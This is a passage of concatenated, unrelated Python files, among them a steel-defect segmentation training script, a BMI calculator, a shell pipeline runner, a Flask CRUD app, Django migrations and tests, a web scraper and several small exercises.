sout = 'Train/Test {:d}/{:d}\n'.format(len(TRAIN_FILES_ALL), len(TEST_FILES)) + \
'Train mean/std {:.3f}/{:.3f}\n'.format(train_mean, train_std) + \
'Test mean/std {:.3f}/{:.3f}\n'.format(test_mean, test_std) +\
'Train num/sample {:d}'.format(len(TRAIN_FILES)) + ' '.join(TRAIN_FILES[:2]) + \
'\nValid num/sample {:d}'.format(len(VALID_FILES)) + ' '.join(VALID_FILES[:2])+'\n'
print2file(sout, LOG_FILE)
########################################################################
# Augmentations
augment_train = Compose([
Flip(p=0.5), # Flip vertically or horizontally or both
ShiftScaleRotate(rotate_limit = 10, p = 0.3),
RandomBrightnessContrast(p = 0.3),
Normalize(mean = (train_mean, train_mean, train_mean), std = (train_std, train_std, train_std)),
ToFloat(max_value=1.)],p=1)
# validation
augment_valid = Compose([
Normalize(mean=(train_mean, train_mean, train_mean), std=(train_std, train_std, train_std)),
ToFloat(max_value=1.)],p=1)
# normal prediction
augment_test = Compose([
Normalize(mean=(test_mean, test_mean, test_mean), std=(test_std, test_std, test_std)),
ToFloat(max_value=1.)],p=1)
########################################################################
# do some simple checking
if args.test_run:
# check rle2mask and mask2rle
mask_df = pd.read_csv(TRAIN_MASKS).set_index(['ImageId_ClassId']).fillna('-1')
for i, pixel in enumerate(mask_df['EncodedPixels']):
if pixel != '-1':
rle_pass = mask2rle(rle2mask(pixel, 1600, 256))
if rle_pass != pixel:
print(i)
# check dataloader
steel_ds = SteelDataset(TRAIN_FILES, args, mask_df = mask_df)
steel_ds_train = SteelDataset(TRAIN_FILES, args, mask_df = mask_df, augment = augment_train)
steel_ds_valid = SteelDataset(VALID_FILES, args, mask_df = mask_df, augment = augment_valid)
res = steel_ds_train[1]
image, mask = res[0], res[1]
print(image.shape, image.min(), image.max())
print(mask.shape, mask.min(), mask.max())
res = steel_ds_valid[1]
image, mask = res[0], res[1]
print(image.shape, image.min(), image.max())
print(mask.shape, mask.min(), mask.max())
# check on the images
nplot = 4
fig, axs = plt.subplots(nplot, 2, figsize=(16,nplot*2))
for i in range(nplot):
ax = axs[divmod(i, 2)]
ax.axis('off')
plot_mask(*steel_ds[i][:2], ax)
ax = axs[divmod(i + nplot, 2)]
plot_mask(*steel_ds_train[i][:2], ax)
ax.axis('off')
plt.savefig('../output/Dataset_augment.png')
########################################################################
# Prepare dataset -> dataloader
# creat the data set
steel_ds_train = SteelDataset(TRAIN_FILES, args, mask_df = mask_df, augment = augment_train)
steel_ds_valid = SteelDataset(VALID_FILES, args, mask_df = mask_df, augment = augment_valid)
# create the dataloader
if args.sampler:
train_sampler = BalanceClassSamplerMultilabel(steel_ds_train, args)
trainloader = torch.utils.data.DataLoader(steel_ds_train,
batch_size = args.batch, num_workers = 4,
sampler = train_sampler, drop_last = True,)
else:
trainloader = torch.utils.data.DataLoader(steel_ds_train, batch_size = args.batch, shuffle = True, num_workers = 4)
validloader = torch.utils.data.DataLoader(steel_ds_valid, batch_size = args.batch, shuffle = False, num_workers = 4)
# cpu or gpu
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# checking the dataloader
if args.test_run:
data = next(iter(trainloader))
inputs, labels = data[0].to(device), data[1].to(device)
print(inputs.shape, inputs.min(), inputs.max(), inputs.dtype)
print(labels.shape, labels.min(), labels.max(), labels.dtype)
########################################################################
# Model
if args.model == 'resnet34' or args.model == 'se_resnet50':
net = Unet(args.model, encoder_weights = "imagenet", classes = 4, activation = None, args = args).to(device) # pass model specification to the resnet32
########################################################################
# optimizer
# if args.optim == 'adam':
optimizer = optim.Adam(net.parameters(), lr = 0.001)
########################################################################
# Train the network
seed_everything(seed = args.seed)
if args.load_mod:
history = {'Train_loss':[], 'Train_dice':[], 'Valid_loss':[], 'Valid_dice':[]}
net.load_state_dict(torch.load(MODEL_FILE))
else:
net_swa, history = train_net(net, optimizer, device, args, LOG_FILE, MODEL_FILE)
torch.save(net_swa, MODEL_SWA_FILE)
# save the final result
print('Finished Training')
history_df = pd.DataFrame(history)
history_df.to_csv(HISTORY_FILE)
# torch.save(net.state_dict(),MODEL_FILE)
# show the curve
fig, axs = plt.subplots(1,2,figsize=(16,4))
axs[0].plot(history['Train_loss'], label = 'Train Loss')
axs[0].plot(history['Valid_loss'], label = 'Valid Loss')
axs[0].legend();axs[0].grid()
axs[0].set_title('Loss')
axs[1].plot(history['Train_dice'], label = 'Train Dice')
axs[1].plot(history['Valid_dice'], label = 'Valid Dice')
axs[1].legend();axs[1].grid()
axs[1].set_title('Dice')
plt.savefig('../output/loss_dice.png')
########################################################################
# Evaluate the network
# get all predictions of the validation set: maybe a memory error here.
if args.load_mod:
# load the best model
net.load_state_dict(torch.load(MODEL_FILE))
eva = Evaluate(net, device, validloader, args, isTest = False)
eva.search_parameter()
dice, dicPred, dicSubmit = eva.predict_dataloader()
# eva.plot_sampled_predict()
# evaluate the prediction
sout = '\nFinal Dice {:.3f}\n'.format(dice) +\
'==============Predict===============\n' + \
analyze_labels(pd.DataFrame(dicPred)) # +\
# '==============True===============\n' + \
# analyze_labels(stat_df_valid)
# print(sout)
# print2file(sout, LOG_FILE)
# print2file(' '.join(str(key)+':'+str(val) for key,val in eva.dicPara.items()), LOG_FILE)
# load swa model
# net.load_state_dict(torch.load(MODEL_SWA_FILE))
# eva = Evaluate(net, device, validloader, args, isTest = False)
# eva.search_parameter()
# dice, dicPred, dicSubmit = eva.predict_dataloader()
# eva.plot_sampled_predict()
# evaluate the prediction
# sout = '\n\nFinal SWA Dice {:.3f}\n'.format(dice/len(VALID_FILES)/4) +\
# '==============SWA Predict===============\n' + \
# analyze_labels(pd.DataFrame(dicPred)) + \
# '==============True===============\n' + \
# analyze_labels(stat_df_valid)
# print(sout)
# print2file(sout, LOG_FILE)
# print2file(','.join('"'+str(key)+'":'+str(val) for key,val in eva.dicPara.items()), LOG_FILE)
|
from numpy import*
p = array(eval(input("MASSA: ")))
a = array(eval(input("alt: ")))
n = size(p)
b = zeros(n)
i = 0
for x in p:
b[i] = round((x/a[i]**2),2)
i += 1
print(b)
print("O MAIOR IMC DA TURMA EH",max(b))
if(max(b)<17):
print("MUITO BAIXO DO PESO")
elif(17<max(b)<=18.49):
print("ABAIXO DO PESO")
elif(18.5<=max(b)<=24.99):
print("PESO NORMAL")
elif(25<=max(b)<= 29.99):
print("ACIMA DO PESO")
elif(30<= max(b)<= 34.99):
print("OBESIDADE")
elif(35<= max(b)<=39.99):
print("OBESIDADE SEVERA")
elif(max(b)<40):
print("OBESIDADE MORBIDA") |
#!/usr/bin/env python3
from networkx import DiGraph
from os import getpid, getppid, execvpe, environ, fork, waitpid
from os import open as os_open, pipe, dup2, close, set_inheritable
from os import O_RDONLY, O_WRONLY
from sys import argv
noread = os_open('/dev/null', O_RDONLY)
nowrite = os_open('/dev/null', O_WRONLY)
set_inheritable(noread, True)
set_inheritable(nowrite, True)
shell = environ.get('SHELL', '/bin/sh')
class Pipe:
def __init__(self):
self.read, self.write = pipe()
def __repr__(self):
return f'Pipe(read={self.read}, write={self.write})\n{hex(id(self))}'
class Command:
def __init__(self, command, ifds=[], ofds=[], env={}):
self.command = command
self.ifds, self.ofds = list(ifds), list(ofds)
self.pid = None
self.env = {'TF_DATA_IN':'0', 'TF_DATA_OUT':'1',
'TF_CTRL_IN':f'{noread}', 'TF_CTRL_OUT':f'{nowrite}', **env, }
def __repr__(self):
return f'Command({self.command!r})\n{hex(id(self))}'
def close_fds(self):
for fd, _, _ in self.ofds:
try: close(fd)
except OSError: pass
def __call__(self):
self.pid = fork()
if self.pid:
return self.pid
for ifd, isdata, name in self.ifds:
set_inheritable(ifd, True)
if isdata:
dup2(ifd, 0)
self.env[f'{name}_IN'] = str(ifd)
for ofd, isdata, name in self.ofds:
set_inheritable(ofd, True)
if isdata:
dup2(ofd, 1)
self.env[f'{name}_OUT'] = str(ofd)
env = {**environ, **self.env}
execvpe(shell, [shell, '-c', self.command], env)
class Tee:
def __init__(self, ifds=[], ofds=[]):
self.ifds, self.ofds = list(ifds), list(ofds)
self.pid = None
def __repr__(self):
return f'Tee({self.ifds!r}, {self.ofds!r})\n{hex(id(self))}'
def close_fds(self):
for fd, _, _ in self.ofds:
try: close(fd)
except OSError: pass
def __call__(self):
self.pid = fork()
if self.pid:
return self.pid
for ifd, _, _ in self.ifds:
set_inheritable(ifd, True)
dup2(ifd, 0)
for ofd, _, _ in self.ofds:
set_inheritable(ofd, True)
args = [f'/proc/self/fd/{ofd}' for ofd, _, _ in self.ofds]
command = f'tee {" ".join(args)} >/dev/null'
execvpe(shell, [shell, '-c', command], environ)
def create_xgraph(graph, nodes, isdata, name):
xgraph = DiGraph()
for u in graph.nodes():
xgraph.add_node(nodes[u])
if graph.out_degree(u) > 1:
t = Tee()
xgraph.add_node(t)
xgraph.add_edge(nodes[u], t)
for v in graph.successors(u):
xgraph.add_edge(t, nodes[v])
else:
for v in graph.successors(u):
xgraph.add_edge(nodes[u], nodes[v])
pipes = {}
pgraph = DiGraph()
for u in xgraph.nodes():
pgraph.add_node(u)
for v in xgraph.successors(u):
if (u, v) not in pipes:
p = Pipe()
for n in xgraph.predecessors(v):
pipes[n, v] = p
p = pipes[u, v]
pgraph.add_edge(u, p)
pgraph.add_edge(p, v)
for u, v in xgraph.edges():
p = pipes[u, v]
u.ofds.append((p.write, isdata, name))
v.ifds.append((p.read, isdata, name))
return xgraph
def run(data_graph, *extra_graphs, filename=''):
nodes = {n: Command(n.contents) for n in data_graph.nodes()}
data_xgraph = create_xgraph(data_graph, nodes, isdata=True, name='TF_DATA')
extra_xgraphs = [create_xgraph(g, nodes, isdata=False, name='TF_CTRL')
for g in extra_graphs]
all_nodes = set(data_xgraph.nodes())
for xg in extra_xgraphs:
all_nodes.update(xg.nodes())
pids = {node(): node for node in all_nodes}
# in the parent: wait for all children
while pids:
pid, rc = waitpid(-1, 0)
if pid in pids:
pids[pid].close_fds()
del pids[pid]
|
# ---------------------- homework_9 ------------------------
def snake_style_converter(phrase):
"""
Func. takes given string, removes all '_' between words and saves in 'phrase'.
First 'for' cycle takes words from 'phrase', makes first letters capitals and saves in 'phrase_cap'.
After it uses 'join' function and saves all phrase in 'camel_case'
At last displays 'camel_case' phrase on the screen
"""
try:
phrase = phrase.split("_")
phrase_cap = []
for sequence in phrase:
word_cap = sequence.capitalize()
phrase_cap.append(word_cap)
camel_case = ''.join(phrase_cap)
print(camel_case)
except AttributeError:
print("\n\tERROR:\n\tType of variable given to func. was wrong, it`s should be string")
print("\nSnake style string: 'employee_first_name_and_second_name'\nTransforms into a Camel case string:")
snake_style_converter("employee_first_name_and_second_name")
snake_style_converter("another_example")
|
"""Handle merging and spliting of DSI files."""
import numpy as np
from nipype.interfaces import afni
import os.path as op
from nipype.interfaces.base import (BaseInterfaceInputSpec, TraitedSpec, File, SimpleInterface,
InputMultiObject, traits)
from nipype.utils.filemanip import fname_presuffix
import nibabel as nb
class MergeDWIsInputSpec(BaseInterfaceInputSpec):
dwi_files = InputMultiObject(
File(exists=True), mandatory=True, desc='list of dwi files')
bids_dwi_files = InputMultiObject(
File(exists=True), mandatory=True, desc='list of original (BIDS) dwi files')
bval_files = InputMultiObject(
File(exists=True), mandatory=True, desc='list of bval files')
bvec_files = InputMultiObject(
File(exists=True), mandatory=True, desc='list of bvec files')
class MergeDWIsOutputSpec(TraitedSpec):
out_dwi = File(desc='the merged dwi image')
out_bval = File(desc='the merged bvec file')
out_bvec = File(desc='the merged bval file')
original_images = traits.List()
class MergeDWIs(SimpleInterface):
input_spec = MergeDWIsInputSpec
output_spec = MergeDWIsOutputSpec
def _run_interface(self, runtime):
bvals = self.inputs.bval_files
bvecs = self.inputs.bvec_files
def get_nvols(img):
shape = nb.load(img).shape
if len(shape) < 4:
return 1
return shape[3]
if len(self.inputs.dwi_files) > 1:
dwimrg = afni.TCat(in_files=self.inputs.dwi_files, outputtype='NIFTI_GZ')
merged_fname = dwimrg.run().outputs.out_file
self._results['out_dwi'] = merged_fname
out_bvec = fname_presuffix(merged_fname, suffix=".bvec", use_ext=False,
newpath=runtime.cwd)
out_bval = fname_presuffix(merged_fname, suffix=".bval", use_ext=False,
newpath=runtime.cwd)
self._results['out_bval'] = combine_bvals(bvals, output_file=out_bval)
self._results['out_bvec'] = combine_bvecs(bvecs, output_file=out_bvec)
sources = []
for img in self.inputs.bids_dwi_files:
sources += [img] * get_nvols(img)
self._results['original_images'] = sources
else:
dwi_file = self.inputs.dwi_files[0]
bids_dwi_file = self.inputs.bids_dwi_files[0]
self._results['out_dwi'] = dwi_file
self._results['out_bval'] = bvals[0]
self._results['out_bvec'] = bvecs[0]
self._results['original_images'] = [bids_dwi_file] * get_nvols(bids_dwi_file)
return runtime
def combine_bvals(bvals, output_file="restacked.bval"):
"""Load, merge and save fsl-style bvals files."""
collected_vals = []
for bval_file in bvals:
collected_vals.append(np.atleast_1d(np.loadtxt(bval_file)))
final_bvals = np.concatenate(collected_vals)
np.savetxt(output_file, final_bvals, fmt=str("%i"))
return op.abspath(output_file)
def combine_bvecs(bvecs, output_file="restacked.bvec"):
"""Load, merge and save fsl-style bvecs files."""
collected_vecs = []
for bvec_file in bvecs:
collected_vecs.append(np.loadtxt(bvec_file))
final_bvecs = np.column_stack(collected_vecs)
np.savetxt(output_file, final_bvecs, fmt=str("%.8f"))
return op.abspath(output_file)
|
# coding: utf-8
import math
from osv import fields,osv
import tools
import pooler
from tools.translate import _
class res_partner_syndicate_ext(osv.osv):
_inherit = 'res.partner'
_columns = {
'syndicate': fields.boolean('Sindicato', help="Check this box if the partner is a syndicate."),
}
res_partner_syndicate_ext()
class hr_syndicate_br(osv.osv):
_inherit = 'hr.employee'
_columns = {
'syndicate_rel': fields.many2many('hr.syndicate.br.reg', 'hr_syndicate_br_rel2', 'cpf', 'name', 'Sindicato'),
}
hr_syndicate_br()
class hr_syndicate_br_reg(osv.osv):
_name = 'hr.syndicate.br.reg'
_columns = {
'reference': fields.integer('Referencia'),
'periodo': fields.date('Período'),
'syndicate_opt': fields.many2one('res.partner', 'Sindicato', domain="[('syndicate','=',1)]"),
'importancia': fields.float('Importância')
}
hr_syndicate_br_reg() |
import boto3
import StringIO
import json
import re
from nose.tools import assert_equals
class TestNumberOfColumns:
def __init__(self):
self.lam = None
def setup(self):
self.lam = boto3.client('lambda')
def json_file(self, line_delimiter='\n', field_delimiter='\t', target_file="out_file_1.txt.gz"):
payload = {
"LineDelimiter": line_delimiter,
"FieldDelimiter": field_delimiter,
"Bucket": 'narp-archive',
"Prefix": target_file
}
return StringIO.StringIO( json.dumps(payload))
def payload(self, resp):
return json.loads( resp['Payload'].read() )
def successful_call(self, resp):
assert_equals( resp['StatusCode'], 200 )
assert( 'FunctionError' not in resp )
def test_when_tab_field_delimiter(self):
resp = self.lam.invoke( FunctionName='NumberOfColumns', Payload=self.json_file() )
self.successful_call(resp)
assert_equals( self.payload(resp), 7)
def test_when_tab_field_and_cr_row_delimiter(self):
resp = self.lam.invoke( FunctionName='NumberOfColumns', Payload=self.json_file("\r", "\t", "out_file_2_cr.txt.gz") )
self.successful_call(resp)
assert_equals( self.payload(resp), 4)
def test_when_referencing_non_existent_file(self):
resp = self.lam.invoke( FunctionName='NumberOfColumns', Payload=self.json_file("\r", "\t", "non_existent_file.txt.gz") )
assert( 'FunctionError' in resp )
assert( re.search( 'The target .+ does not exist.', self.payload(resp)['errorMessage'] ))
def test_when_using_delimiters_that_dont_exist_in_file(self):
resp = self.lam.invoke( FunctionName='NumberOfColumns', Payload=self.json_file("\r\n", "\r\n", "out_file_1.txt.gz"))
assert( 'FunctionError' in resp )
mess = self.payload(resp)['errorMessage']
assert( re.search( 'Task timed out after 10.00 seconds', mess ) is not None )
|
"""
:summary This is python 3.7 supported selenium 3.141.0
:since January 2020
:author Sathya Sai M
:keyword Python, selenium basics conditionalcommands
"""
import time
from selenium import webdriver
class Conditional:
def conditional(self):
driver = webdriver.Chrome(executable_path="../Drivers/chromedriver.exe") # opens the chrome driver
driver.get("http://localhost:8085/register") # opens the link
email = driver.find_element_by_name("email_id")
print(email.is_displayed())
print(email.is_enabled())
user = driver.find_element_by_name("username")
print(user.is_displayed())
print(user.is_enabled())
passw = driver.find_element_by_name("password")
print(passw.is_displayed())
print(passw.is_enabled())
email.send_keys("prem@gmail.com")
time.sleep(2)
user.send_keys("prem")
time.sleep(2)
passw.send_keys("12345")
time.sleep(2)
driver.find_element_by_name("Submit").click()
time.sleep(2)
driver.get("http://localhost:8085/login")
user = driver.find_element_by_name("username")
user.send_keys("prem")
time.sleep(2)
passw = driver.find_element_by_name("password")
passw.send_keys("12")
time.sleep(2)
driver.find_element_by_name("Submit").click()
time.sleep(2)
driver.quit()
if __name__ == '__main__':
c = Conditional()
c.conditional()
|
import numpy as np
from collections import defaultdict
from itertools import groupby
def find_nth_vaporized(asteroids, position, n):
"""Return position of the nth asteroid to be vaporized."""
groups = group_by_angle(asteroids, position)
deleted = 0
i = 0
while deleted < n - 1:
if groups[i]:
groups[i].pop(0)
deleted += 1
i = (i + 1) % len(groups)
return groups[i].pop(0)
def find_best_position(asteroids):
"""Return position and count for asteroid with highest visibility."""
counts = {a: len(group_by_angle(asteroids, a)) for a in asteroids}
best = max(counts, key=counts.get)
return best, counts[best]
def group_by_angle(asteroids, position):
"""Return asteroids grouped by angle, then sorted by distance from position.
Angle refers to the clockwise angle of the position-asteroid-vector
relative to the vector that goes straigt upwards, i.e. (0, -1).
Example:
>>> group_by_angle(set([(2, 0), (1, 0), (0, 1)]), (0, 0))
[[(1, 0), (2, 0)], [(0, 1)]]
"""
def angle(asteroid):
diff = np.subtract(asteroid, position)
return (360 - np.rad2deg(np.arctan2(*-diff))) % 360
def dist(asteroid):
diff = np.subtract(asteroid, position)
return np.linalg.norm(diff)
asteroids = [a for a in asteroids if a != position]
asteroids.sort(key=lambda a: (angle(a), dist(a)))
return [list(group) for _, group in groupby(asteroids, angle)]
def parse_input(asteroids):
"""Return a set of positions of all asteroids."""
positions = set()
for i, line in enumerate(asteroids.strip().split('\n')):
for j, symbol in enumerate(line.strip()):
if symbol == '#':
positions.add((j, i))
return positions
|
from flask import Flask, render_template, request, redirect, url_for
import mysql.connector
from mysql.connector import cursor
connection = mysql.connector.connect(
host="localhost", database="Company", user="root", password="Pass@123"
)
app = Flask(__name__)
@app.route("/home")
def home():
con = connection.cursor()
sql = "select * from users"
con.execute(sql)
result = con.fetchall()
return render_template("home.html", datas=result)
@app.route("/addusers", methods=["GET", "POST"])
def addusers():
if request.method == "POST":
name = request.form["name"]
phno = request.form["phno"]
address = request.form["address"]
bday = request.form["bday"]
gender = request.form["gender"]
qualification = request.form["qualification"]
extraqualifi = request.form["extraqualifi"]
mycur = connection.cursor()
sql = "insert into users(name,phno,address,bday,gender,qualification,extraqualifi) values (%s,%s,%s,%s,%s,%s,%s)"
record = (name, phno, address, bday, gender, qualification, extraqualifi)
mycur.execute(sql, record)
connection.commit()
# mycur.close()
return redirect(url_for("home"))
return render_template("addusers.html")
@app.route("/editUsers/<string:id>", methods=["POST", "GET"])
def editUsers(id):
con = connection.cursor()
con.execute("SELECT * FROM users WHERE id=%s", [id])
res = con.fetchone()
return render_template("editUsers.html", datas=res)
@app.route("/update", methods=["GET", "POST"])
def update():
con = connection.cursor()
if request.method == "POST":
id = request.form["id"]
name = request.form["name"]
phno = request.form["phno"]
address = request.form["address"]
bday = request.form["bday"]
gender = request.form["gender"]
qualification = request.form["qualification"]
extraqualifi = request.form["extraqualifi"]
sql = "update users set name=%s,phno=%s,address=%s,bday=%s,gender=%s,qualification=%s,extraqualifi=%s where id= %s"
con.execute(
sql, [name, phno, address, bday, gender, qualification, extraqualifi, id]
)
connection.commit()
return redirect(url_for("home"))
@app.route("/deleteUser/<string:id>", methods=["GET", "POST"])
def deleteUser(id):
con = connection.cursor()
sql = "delete from users where id= %s"
con.execute(sql, [id])
connection.commit()
con.close()
return redirect(url_for("home"))
if __name__ == "__main__":
app.run(debug=True)
|
import re
from typing import Tuple
from runrex.main import process
from runrex.schema import validate_config
from anaphylaxis_nlp.algo.epinephrine import get_epinephrine
from anaphylaxis_nlp.algo.observation import get_observation
from anaphylaxis_nlp.algo.primary_dx import get_anaphylaxis_dx
from anaphylaxis_nlp.algo.sudden import get_suddenness
def main(config_file):
conf = validate_config(config_file)
algorithms = {
'dx': get_anaphylaxis_dx,
'sudden': get_suddenness,
'epinephrine': get_epinephrine,
'observation': get_observation,
}
process(**conf, algorithms=algorithms, ssplit=ssplit)
def subsplit(sentence: str, start: int, pattern) -> Tuple[str, int, int]:
curr_start = 0
for sm in pattern.finditer(sentence):
yield sentence[curr_start: sm.start()], start + curr_start, start + sm.start()
curr_start = sm.start()
yield sentence[curr_start:], start + curr_start, start + len(sentence)
def ssplit(text: str) -> Tuple[str, int, int]:
text = ' '.join(text.split('\n')) # join broken lines
sub_pat = re.compile(r'[*•-]')
start = 0
for m in re.finditer(r'(?<!\w\.\w.)(?<![A-Z][a-z]\.)(?<=\.|\?|\!|\*)\s', text):
yield from subsplit(text[start: m.start()], start, sub_pat)
start = m.start()
yield from subsplit(text[start:], start, sub_pat)
if __name__ == '__main__':
import sys
try:
main(sys.argv[1])
except IndexError:
raise AttributeError('Missing configuration file: Usage: run.py file.(json|yaml|py)')
|
# Generated by Django 2.1.5 on 2020-07-08 18:29
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Brand',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='Car',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('release_year', models.IntegerField()),
('transmission', models.SmallIntegerField(choices=[(1, 'механика'), (2, 'автомат'), (3, 'робот')])),
('color', models.CharField(max_length=30)),
],
),
migrations.CreateModel(
name='Model',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=20)),
('brand', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='common.Brand')),
],
),
migrations.AddField(
model_name='car',
name='model',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='common.Model'),
),
]
|
from bs4 import BeautifulSoup
import glob
import os
from fpdf import FPDF
fpath = "/projects/niblab/bids_projects/Experiments/BBx/fmriprep/ses-1/sub-*/fmriprep/sub*.html"
htmls = glob.glob(fpath)
svgpath = "/projects/niblab/bids_projects/Experiments/BBx/fmriprep/ses-1/sub-*/fmriprep/sub-*/figures/*rois.svg"
pngpath = "/projects/niblab/bids_projects/Experiments/BBx/derivatives/pngs"
os.chdir(pngpath)
pngs= glob.glob("*.png")
png_dict = { }
for image in pngs:
print("IMAGE: ", image)
sub = image.split("_")[0]
#print(sub, task, run)
if sub not in png_dict:
print("----------> MAKING DICTIONARY")
png_dict[sub] = []
png_dict[sub].append(image)
#png_dict[sub]["PNGS"] = image
else:
png_dict[sub].append(image)
print("#######%s DICTIONARY SUB: %s###########" %(sub, png_dict[sub]))
outpath = "/projects/niblab/bids_projects/Experiments/BBx/derivatives/pdfs"
os.chdir(outpath)
pdf = FPDF()
titlepage = "BBx Quality Check \nPart 1: fMRIprep preprocessing \nSession 1"
pdf.set_title("BBx Session 1 QC Part A")
pdf.add_page()
pdf.set_font('Arial', 'B', 15)
pdf.multi_cell(0,20, titlepage, 0, 0, 'C' )
for sub in png_dict:
print("UNSORTED DICTIONARY -----------> %s"%png_dict[sub])
png_dict[sub] = sorted(png_dict[sub])
print("SORTED DICTIONARY -----------> %s"%png_dict[sub])
for image in png_dict[sub]:
fullimg = pngpath+"/"+image
print("-------------------------> WRITING TO PDF")
print("FULL IMAGE PATH ------> %s"%(fullimg))
task = image.split("_")[2]
taskid = task.split('-')[1]
id = sub.split('-')[1]
print("----> IS RESTING? ")
if 'resting' not in task:
print("-------------> NOT")
run = image.split("_")[3]
runid = run.split('-')[1]
else:
print("--------------> TRUE")
run = None
runid = None
lineA = "SUBJECT: %s || TASK: %s || RUN: %s || \nFILENAME: %s "%(id, taskid, runid, image)
print("LINE A : %s "%(lineA))
pdf.add_page()
pdf.image(fullimg, 5,50, 200)
pdf.set_font('Arial', 'B', 15)
pdf.multi_cell(0, 20, lineA, 0, 0)
pdf.output("yourfile.pdf", "F")
|
from django.contrib.auth.models import User
from django.test import TestCase
from ..models import Task, Preferences
class TaskModelTests(TestCase):
@classmethod
def setUpTestData(cls):
User.objects.create_user(username='tom', email='tom@dummy.com', password='asdf1234')
def setUp(self):
self.client.login(username='tom', password='asdf1234')
user = User.objects.first()
Task.objects.create(
name='another task', description='testing page', issued_by=user)
def test_field_label_name(self):
task = Task.objects.first()
field_label = task._meta.get_field('name').verbose_name
self.assertEquals(field_label, 'name')
def test_field_label_description(self):
task = Task.objects.first()
field_label = task._meta.get_field('description').verbose_name
self.assertEquals(field_label, 'description')
def test_field_label_issued_by(self):
task = Task.objects.first()
field_label = task._meta.get_field('issued_by').verbose_name
self.assertEquals(field_label, 'issued by')
def test_field_label_done(self):
task = Task.objects.first()
field_label = task._meta.get_field('done').verbose_name
self.assertEquals(field_label, 'done')
def test_field_label_done_by(self):
task = Task.objects.first()
field_label = task._meta.get_field('done_by').verbose_name
self.assertEquals(field_label, 'done by')
def test_field_label_name_max_length(self):
task = Task.objects.first()
field_length = task._meta.get_field('name').max_length
self.assertEquals(field_length, 40)
def test_field_label_description_max_length(self):
task = Task.objects.first()
field_length = task._meta.get_field('description').max_length
self.assertEquals(field_length, 4000)
class PreferencesModelTests(TestCase):
@classmethod
def setUpTestData(cls):
User.objects.create_user(username='tom', email='tom@dummy.com', password='asdf1234')
user = User.objects.first()
def test_field_label_user(self):
preferences = Preferences.objects.first()
field_label = preferences._meta.get_field('user').verbose_name
self.assertEquals(field_label, 'user')
def test_field_label_show_all(self):
preferences = Preferences.objects.first()
field_label = preferences._meta.get_field('show_all').verbose_name
self.assertEquals(field_label, 'show all')
|
from collections import Counter
class Pattern(object):
def __init__(self, index, x, y, dx, dy):
self.index = index
self.pos_tuples = []
for xi in range(x,x+dx):
for yi in range(y,y+dy):
self.pos_tuples.append((xi,yi))
def all_pos_unique(self, pos_counter):
return all([pos_counter[pos]==1 for pos in self.pos_tuples])
def parse_patterns(lines):
#TODO switch to RE
patterns = []
for li in lines:
fields = li.split()
index = fields[0][1:]
pos_fields = fields[2][:-1].split(',')
size_fields = fields[3].split('x')
x,y = [int(s) for s in pos_fields]
dx,dy = [int(s) for s in size_fields]
patterns.append(Pattern(index,x,y,dx,dy))
return patterns
def get_pos_counter(patterns):
pos_counter = Counter()
for pat in patterns:
for pos in pat.pos_tuples:
pos_counter[pos] += 1
return pos_counter
def part1(patterns):
pos_counter = get_pos_counter(patterns)
overlapped_pos = [k for k,v in pos_counter.items() if v >= 2]
return len(overlapped_pos)
def part2(patterns):
pos_counter = get_pos_counter(patterns)
for pat in patterns:
if pat.all_pos_unique(pos_counter):
return pat.index
def main():
f = open('input.txt', 'r')
lines = f.readlines()
f.close()
patterns = parse_patterns(lines)
print(part1(patterns))
print(part2(patterns))
if __name__ == '__main__':
main()
|
import logging
import requests
from bs4 import BeautifulSoup
css_url = "https://chicagosocial.com/sports/indoor-volleyball/"
def parse_css(content):
schedules = []
league = "Chicago Sports and Social"
soup = BeautifulSoup(content, "html.parser")
rows = soup.select(".hide-on-mobile.league-row")
for row in rows:
try:
cols = row.select("td")
day = cols[1].text.strip()
location = cols[2].text.strip()
gender = cols[3].text.strip()
skill = cols[4].text.strip()
fmt = cols[5].text.strip()
time = cols[6].text.strip()
start_date = cols[7].text.strip()
team_price = cols[8].text.strip()
solo_price = cols[9].text.strip()
schedules.append({
'day': day,
'location': location,
'gender': gender,
'skill': skill,
'fmt': fmt,
'time': time,
'start_date': start_date,
'team_price': team_price,
'solo_price': solo_price
})
except Exception as e:
logging.error(str(e))
return schedules
url = "https://chicagosocial.com/sports/indoor-volleyball/"
r = requests.get(url)
s = parse_css(r.content)
for sch in s:
print(sch)
|
from django.urls import path
from .views import (
SearchProductView,
fluid_search,
)
urlpatterns = [
path('', SearchProductView.as_view(), name='query'),
path('ajax-search/', fluid_search, name='fluid-search')
# path('<slug>/', ProductDetailViewSlug.as_view(), name='details'),
] |
"""
Test to make sure specifying that modules have a shared mycontext
"""
import repyhelper
import test_utils
TESTFILE1 = "rhtest_mycontext_shared1.r2py"
TESTFILE2 = "rhtest_mycontext_shared2.r2py"
test_utils.cleanup_translations([TESTFILE1, TESTFILE2])
modname1 = repyhelper.translate(TESTFILE1, shared_mycontext=True)
mod1 = __import__(modname1)
reload(mod1)
modname2 = repyhelper.translate(TESTFILE2, shared_mycontext=True)
mod2 = __import__(modname2)
reload(mod2)
result = mod2.foo()
if result == 'bar':
pass
else:
print "Context sharing failed! foo returned", mod2.foo()
print "mod1's mycontext =", mod1.mycontext
print "mod2's mycontext =", mod2.mycontext
test_utils.cleanup_translations([TESTFILE1, TESTFILE2])
|
# have a help command
# have a show command
# Make a list to hold on Items
shopping_list = []
def show_help():
# Print out instreuction
print("What shoud we pick up from store? ")
print("""
Enter 'DONE' to stop adding items.
Enter 'HELP' for this help.
Enter 'SHOW' to see your list
""")
show_help()
#print out the list
def show_list():
print("here is your list:")
for item in shopping_list:
print(item)
def add_to_list(item):
# add new item to our list
shopping_list.append(item)
print("Addded {}. List now has {} items".format(item, len(shopping_list)))
while True:
# ask for new item
new_item = input("> ")
# be able to quit the app
if(new_item.upper() == "DONE"):
break
elif new_item.lower() == "help":
show_help()
continue
elif new_item.lower() == "show":
show_list()
continue
add_to_list(new_item)
show_list()
|
#coding: utf-8
"""
